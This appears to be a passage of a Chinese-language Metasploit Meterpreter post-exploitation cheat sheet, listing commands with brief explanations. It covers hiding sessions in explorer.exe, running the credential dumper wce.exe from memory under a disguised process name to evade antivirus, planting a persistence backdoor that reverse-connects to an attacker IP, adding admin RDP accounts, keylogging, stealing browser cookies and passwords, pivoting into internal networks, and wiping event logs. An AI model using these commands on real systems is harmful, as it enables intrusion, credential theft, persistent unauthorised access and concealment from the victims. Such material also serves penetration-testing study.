edit
修改主机上的文件
例如
修改 hosts
192.168.1.1 baidu.com
search
搜索目标主机上的文件
search -d c:\ -f *.doc
portfwd
端口转发
portfwd add -l 1122 -p 3389 -r 192.168.1.1# 把目标主机 192.168.1.1 的 3389 端口转发至 1122
rdesktop -u administrator -p 123456 192.168.1.1:1122
migrate
将meterpreter 会话移植到另一个进程
例如反弹的meterpreter会话是对方打开了一个你预置特殊代码的word文档而产生的,那么对方一旦关闭掉该word文档,
我们获取到的meterpreter会话就会随之关闭,
所以把会话进程注入到explorer.exe是一个好方法可以先用ps命令看一下目标主机的explorer.exe进程的pid
然后我们用migrate 1668 把meterpreter会话注入进去
execute
execute -f notepad.exe
弹出一个记事本程序
使用 -H 参数 使程序隐藏在后台执行
execute -H -i -f cmd.exe我们运行目标主机上的cmd.exe程序,并以隐藏的方式直接交互到我们的meterpreter会话上命令
在目标主机内存中直接执行我们攻击主机上的攻击程序,比如wce.exe,又比如木马等,这样可以避免攻击程序存储到目标主机硬盘上被发现或被查杀。
execute -H -m -d notepad.exe -f wce.exe -a "-o wce.txt"
-d 在目标主机执行时显示的进程名称(用以伪装)
-m 直接从内存中执行
"-o wce.txt"是wce.exe的运行参数
getpid
获取meterpreter会话在目标主机上注入进程的进程号
persistence后渗透模块向目标主机植入后门程序
run persistence -X -i 5 -p 4444 -r 172.17.11.18
-X 在目标主机上开机自启动
-i 不断尝试反向连接的时间间隔
调用metsvc后渗透攻击模块
调用getgui后渗透攻击模块
作用:开启目标主机远程桌面,并可添加管理员组账号
开启目标主机的远程桌面服务后,可以添加账号以便利用
run getgui -u example_username -p example_password
执行成功,可以使用kali的rdesktop命令使用远程桌面连接目标主机
rdesktop -u kali -p meterpreter 192.168.250.176:3389
键盘记录器功能keyscan
命令:
keyscan_start 开启记录目标主机的键盘输入
keyscan_dump 输出截获到的目标键盘输入字符信息
keyscan_stop 停止键盘记录
调用post/windows/gather/enum_applications模块获取目标主机上的软件安装信息
命令:run post/windows/gather/enum_applications
调用post/windows/gather/dumplinks获取目标主机上最近访问过的文档、链接信息
命令:run post/windows/gather/dumplinks
调用post/windows/gather/enum_ie后渗透模块
读取目标主机IE浏览器cookies等缓存信息,嗅探目标主机登录过的各类账号密码
命令:run post/windows/gather/enum_ie
获取到的目标主机上的ie浏览器缓存历史记录和cookies信息等都保存到了攻击主机本地的/root/.msf5/loot/目录下。
route
route命令可以借助meterpreter会话进一步msf渗透内网,我们已经拿下并产生meterpreter反弹会话的主机可能出于内网之中,外有一层NAT,我们无法直接向其内网中其他主机发起攻击,则可以借助已产生的meterpreter会话作为路由跳板,攻击内网其它主机。
run get_local_subnets
查看已拿下的目标主机的内网IP段情况
其内网尚有192.168.249.0/24网段,我们无法直接访问
下面做一条路由,下一跳为当前拿下主机的session id(目前为5),即所有对249网段的攻击流量都通过已渗透的这台目标主机的meterpreter会话来传递。
命令:route add 192.168.249.0 255.255.255.0 5
clearev命令
入侵痕迹擦除
在渗透利用过程中难免留下日志等信息痕迹,使用clearev命令擦除痕迹后再跑。
命令:clearev
